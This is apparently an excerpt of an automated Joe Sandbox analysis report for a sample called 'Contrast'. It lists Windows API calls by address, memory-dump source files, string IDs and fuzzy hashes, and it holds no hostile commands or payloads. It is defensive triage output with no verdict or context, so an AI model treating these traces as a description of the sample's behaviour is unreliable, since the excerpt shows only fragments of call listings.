                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0056CC3F
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0056CC48
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0056CCB3
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0056CCB9
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0056CCC0
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0056CD0C
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0056CD19
                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0056CD3E
                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0056CD69
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                        • Opcode ID: e9531b18ad3b89bb72cfac24cd6c68377dba947df38bec465c7286fa775e4717
                                                                                                                                        • Instruction ID: a10d102b883a3c9211a2d5160d3128d2fa1e0f3cb36acc941e17fb773205b70b
                                                                                                                                        • Opcode Fuzzy Hash: e9531b18ad3b89bb72cfac24cd6c68377dba947df38bec465c7286fa775e4717
                                                                                                                                        • Instruction Fuzzy Hash: 03516C30900709AFEB20DFA8CE89B6EBFF5FF44705F004918E596A35A0D775A958DB50
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0059A87E
                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 0059A8F8
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0059A972
                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0059A994
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A9A7
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0059A9C9
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 0059AA00
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059AA19
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0059AA32
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0059AA39
                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0059AA51
                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0059AA69
                                                                                                                                          • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                                        • Opcode ID: 5bc34cced55527973c1fc18ad6331f41323cf5c323f1078cdd60c98831e9a483
                                                                                                                                        • Instruction ID: ffe3cd1df40e80d76e842b2beac8328f6d1067dfdeccb2cabe773793d43b9966
                                                                                                                                        • Opcode Fuzzy Hash: 5bc34cced55527973c1fc18ad6331f41323cf5c323f1078cdd60c98831e9a483
                                                                                                                                        • Instruction Fuzzy Hash: 3771CD70550245AFDB21CF28CC48F6B7BE5FB99304F08051EF986872A1D770E949EBA6
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0059CCCF
                                                                                                                                          • Part of subcall function 0059B1A9: ClientToScreen.USER32(?,?), ref: 0059B1D2
                                                                                                                                          • Part of subcall function 0059B1A9: GetWindowRect.USER32(?,?), ref: 0059B248
                                                                                                                                          • Part of subcall function 0059B1A9: PtInRect.USER32(?,?,0059C6BC), ref: 0059B258
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CD38
                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0059CD43
                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0059CD66
                                                                                                                                        • _wcscat.LIBCMT ref: 0059CD96
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0059CDAD
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CDC6
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CDDD
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CDFF
                                                                                                                                        • DragFinish.SHELL32(?), ref: 0059CE06
                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0059CEF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                        • API String ID: 169749273-3440237614
                                                                                                                                        • Opcode ID: 63e3696d133315da8552789aae0473d5eb04e2837ebea3bf7973c888196c3a36
                                                                                                                                        • Instruction ID: b97797759bc733ee365c4429efe843b3c9c4b88c691cd1358d7c93f8ff719d1a
                                                                                                                                        • Opcode Fuzzy Hash: 63e3696d133315da8552789aae0473d5eb04e2837ebea3bf7973c888196c3a36
                                                                                                                                        • Instruction Fuzzy Hash: 8B614771108301AFDB11EF54D889D9BBFE8BBD9350F000A2EF595921A1DB709A49CB92
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0057831A
                                                                                                                                        • VariantCopy.OLEAUT32(00000000,?), ref: 00578323
                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0057832F
                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0057841D
                                                                                                                                        • __swprintf.LIBCMT ref: 0057844D
                                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00578479
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0057852A
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 005785BE
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00578618
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00578627
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00578665
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                                        • Opcode ID: cdd6e2a7f1f73e20e32ff0e2ebc6aa7ab71cbe1d7dfd16da100d7e83932625bd
                                                                                                                                        • Instruction ID: a49b345b2da5c33c9a859e739e5c3eab85bce35c0a4a016aa28be3bfbd7afe86
                                                                                                                                        • Opcode Fuzzy Hash: cdd6e2a7f1f73e20e32ff0e2ebc6aa7ab71cbe1d7dfd16da100d7e83932625bd
                                                                                                                                        • Instruction Fuzzy Hash: DAD1CF71644516EBDB209FA9E89CB7EBFB4BF45700F14C955E40DAB280DF70A844EBA0
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00594A61
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00594AAC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                                        • Opcode ID: e13c34d99c3b1e880cd8c7cde05320dcb95fc00284231707550aaf9bfbe3a3e1
                                                                                                                                        • Instruction ID: 10a9ac12c1641b23e4480a9d77a4f2821c30fac5f90e67c8c12e7aa6c7a34743
                                                                                                                                        • Opcode Fuzzy Hash: e13c34d99c3b1e880cd8c7cde05320dcb95fc00284231707550aaf9bfbe3a3e1
                                                                                                                                        • Instruction Fuzzy Hash: 3C9127742047129FCF08EF60C455A6ABFA2BF94354F148858E8965B3A2DB35ED4ACF81
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0059BF26
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005997E7), ref: 0059BF82
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059BFBB
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0059BFFE
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059C035
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0059C041
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059C051
                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,005997E7), ref: 0059C060
                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0059C07D
                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0059C089
                                                                                                                                          • Part of subcall function 0053312D: __wcsicmp_l.LIBCMT ref: 005331B6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                        • API String ID: 1212759294-1154884017
                                                                                                                                        • Opcode ID: 1d6e2ecae52539bf0cbbad322a6d7af73b4ab64b07af29f81ae04a8dcf8a72ec
                                                                                                                                        • Instruction ID: 15e5d4ddd9039caeb482c6cfde18e14042d6748c429b669d7c330a3406f572f8
                                                                                                                                        • Opcode Fuzzy Hash: 1d6e2ecae52539bf0cbbad322a6d7af73b4ab64b07af29f81ae04a8dcf8a72ec
                                                                                                                                        • Instruction Fuzzy Hash: C061CCB1900619FAEF14DF64DC8ABBE7FA8FB08710F104209F915D61D1DB75AA84DBA0
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0057E31F
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0057E32F
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0057E33B
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0057E399
                                                                                                                                        • _wcscat.LIBCMT ref: 0057E3B1
                                                                                                                                        • _wcscat.LIBCMT ref: 0057E3C3
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0057E3D8
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E3EC
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E41E
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E43F
                                                                                                                                        • _wcscpy.LIBCMT ref: 0057E44B
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0057E48A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                                        • Opcode ID: de947745dada0322bf23adb0ddca0c5ba07a1b0ad35bbaee52cb2dcbb5c2b0b8
                                                                                                                                        • Instruction ID: f02ce819c0974cf88bbf3cffc929cfb49815c823d887353d9ee143919a002270
                                                                                                                                        • Opcode Fuzzy Hash: de947745dada0322bf23adb0ddca0c5ba07a1b0ad35bbaee52cb2dcbb5c2b0b8
                                                                                                                                        • Instruction Fuzzy Hash: 076189765047069FCB10EF60D849A9EBBE8FF89310F04895EF98983251EB31E945CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005124AF
                                                                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0051254A
                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0054BFE7
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054C018
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054C02F
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054C04B
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0054C05D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                        • String ID: hZ
                                                                                                                                        • API String ID: 641708696-3824762921
                                                                                                                                        • Opcode ID: c6210797d1e6f6c4f896f1d33700be9e1eb1aa485c8f32716c5a623f426e9d5c
                                                                                                                                        • Instruction ID: 0aff48e526d4383e81409f2e88cad8d1abfb5d03c0cffce2d75f58479fe886cf
                                                                                                                                        • Opcode Fuzzy Hash: c6210797d1e6f6c4f896f1d33700be9e1eb1aa485c8f32716c5a623f426e9d5c
                                                                                                                                        • Instruction Fuzzy Hash: 6B61DF30116605DFEB359F14C84CBAA7FF1FB94316F50991AE4464BAA0C3B1A8E4EF90
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A2C2
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0057A2E3
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A33C
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A355
                                                                                                                                        • _wprintf.LIBCMT ref: 0057A3FC
                                                                                                                                        • _wprintf.LIBCMT ref: 0057A41A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 311963372-3080491070
                                                                                                                                        • Opcode ID: 49a2584878d71ceb14142aa8457fdf80f412eac40c4a10bc1b38b4014b49eda5
                                                                                                                                        • Instruction ID: d6df841c4fdeb55bed42575599aaa06f4f5ae55c4ab01cb1254489301b5a7b29
                                                                                                                                        • Opcode Fuzzy Hash: 49a2584878d71ceb14142aa8457fdf80f412eac40c4a10bc1b38b4014b49eda5
                                                                                                                                        • Instruction Fuzzy Hash: 2451B37190151AAACF14EBE0ED4AEEEBF79BF65340F104165F405B2092EB312F58DB91
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0055F8B8,00000001,0000138C,00000001,00000000,00000001,?,00583FF9,00000000), ref: 0057009A
                                                                                                                                        • LoadStringW.USER32(00000000,?,0055F8B8,00000001), ref: 005700A3
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,005D7310,?,00000FFF,?,?,0055F8B8,00000001,0000138C,00000001,00000000,00000001,?,00583FF9,00000000,00000001), ref: 005700C5
                                                                                                                                        • LoadStringW.USER32(00000000,?,0055F8B8,00000001), ref: 005700C8
                                                                                                                                        • __swprintf.LIBCMT ref: 00570118
                                                                                                                                        • __swprintf.LIBCMT ref: 00570129
                                                                                                                                        • _wprintf.LIBCMT ref: 005701D2
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005701E9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                                        • Opcode ID: 6d5b3b6641c19b80ec2c836e5dfd98204eff1894cade7ff00fa49988169ebf75
                                                                                                                                        • Instruction ID: 2d44fdeb2488dec5711873f7fc721de38eb3404a68767414350bf44068775739
                                                                                                                                        • Opcode Fuzzy Hash: 6d5b3b6641c19b80ec2c836e5dfd98204eff1894cade7ff00fa49988169ebf75
                                                                                                                                        • Instruction Fuzzy Hash: CC41437280052AAACB14FBE0DD4ADEFBB78BFA5340F500155F505B20D2DA305F48DAA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0057AA0E
                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 0057AA5B
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057AAA3
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057AADA
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057AB08
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                                        • Opcode ID: b92d9f4bee4107e9b84676d610a19edef474e6a5a0b36a58edec2d19fde5d813
                                                                                                                                        • Instruction ID: 983f1254dddfb4c32b4f5d532edda45e46c1a2697e32215e06f708d7c2f849bb
                                                                                                                                        • Opcode Fuzzy Hash: b92d9f4bee4107e9b84676d610a19edef474e6a5a0b36a58edec2d19fde5d813
                                                                                                                                        • Instruction Fuzzy Hash: E1516B711047069FD700EF10D886D6BBBE4FF95758F10892CF899572A1DB31AE09CB92
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0057A852
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A874
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057A8B1
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0057A8D6
                                                                                                                                        • _memset.LIBCMT ref: 0057A8F5
                                                                                                                                        • _wcsncpy.LIBCMT ref: 0057A931
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0057A966
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0057A971
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0057A97A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0057A984
                                                                                                                                        Strings
